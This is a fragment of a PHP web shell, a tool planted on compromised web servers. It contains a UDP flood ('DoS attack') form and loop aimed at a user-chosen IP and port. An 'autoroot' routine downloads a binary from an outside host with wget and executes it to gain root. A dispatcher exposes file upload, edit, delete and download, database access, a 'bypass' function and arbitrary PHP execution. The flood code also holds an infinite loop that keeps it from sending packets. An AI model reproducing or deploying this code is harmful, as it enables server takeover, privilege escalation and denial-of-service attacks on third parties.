echo'<td><input type="text" name="ip" size="30" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=="" ) this.value = "0.0.0.0";" onfocus = " if ( this.value == "0.0.0.0" ) this.value = "";"/>
</td></tr>
<tr><td>Time</td><td>:</td>';
echo'<td><input type="text" name="time" size="30" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=="" ) this.value = "time (in seconds)";" onfocus = " if ( this.value == "time (in seconds)" ) this.value = "";"/>';
echo'</td></tr>
<tr><td>Port</td><td>:</td>
<td><input type="text" name="port" size="30" maxlength="5"  value = "port" onblur = "if ( this.value=="" ) this.value = "port";" onfocus = " if ( this.value == "port" ) this.value = "";"/>';
echo'</td></tr></tr></table></b><br>
<input type="submit" name="fire" value="    lets go Firee !!!   "/>
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>';

mainbottom();

$submit = $_POST['fire'];
if (isset($submit)) {

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;


for(;;){
        $out .= "X";
}

while(1){
$packets++;
        if(time() > $max_time){
                break;
        }

        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
}
}

function autoroot()
{
maintop("AUTO R00T");

if (strtolower(substr(PHP_OS,0,3))=="win")
    {
$sys='win';

echo "<center><h4>System is |Windows| Therfore cant Be R00ted !!!</h4>";

}
 else
{
$sys='unix';

system("mkdir lnx;chmod 0777 lnx;cd lnx/");

system("wget http://perlesbleues.com/language/fr-FR/a.out");

system("chmod +x a.out");

system("./a.out");

sleep(1);

system("id");

}

mainbottom();

}

switch($op) {

    case "home":
	home();
	break;

    case "up":
	up();
	break;

    case "upload":
	upload($_FILES['upfile'], $_REQUEST['ndir']);
	break;

    case "del":
	del($_REQUEST['dename']);
	break;

    case "delete":
	delete($_REQUEST['dename']);
	break;

    case "edit":
	edit($_REQUEST['fename']);
	break;

    case "download":
	download($_REQUEST['file'], $_REQUEST['folder']);
	break;

    case "save":
	save($_REQUEST['ncontent'], $_REQUEST['fename']);
	break;

    case "cr":
	cr();
	break;

    case "create":
	create($_REQUEST['nfname'], $_REQUEST['isfolder'], $_REQUEST['ndir']);
	break;

    case "ren":
	ren($_REQUEST['file']);
	break;

    case "rename":
	renam($_REQUEST['rename'], $_REQUEST['nrename'], $folder);
	break;

    case "mov":
	mov($_REQUEST['file']);
	break;

    case "move":
	move($_REQUEST['file'], $_REQUEST['ndir'], $folder);
	break;

    case "viewframe":
	viewframe($_REQUEST['file']);
	break;

    case "viewtop":
	viewtop($_REQUEST['file']);
	break;

    case "printerror":
	printerror($error);
	break;

    case "logout":
	logout();
	break;

     case "phpinfo":

        infoofphp();
        break;

    case "myssql":

        myssql($servername,$username,$password);
        break;

    case "domains";
    getdomains();
    break;

   case"bypass";
   bypass();
   break;

   case"phpcode";
   phpcode();
   break;

    case"bpcf";
   bpcf();
   break;

   case"ddos";
   ddos();
   break;

 case"r00t";
   autoroot();
   break;

    default:
    home();
    break;

}
?>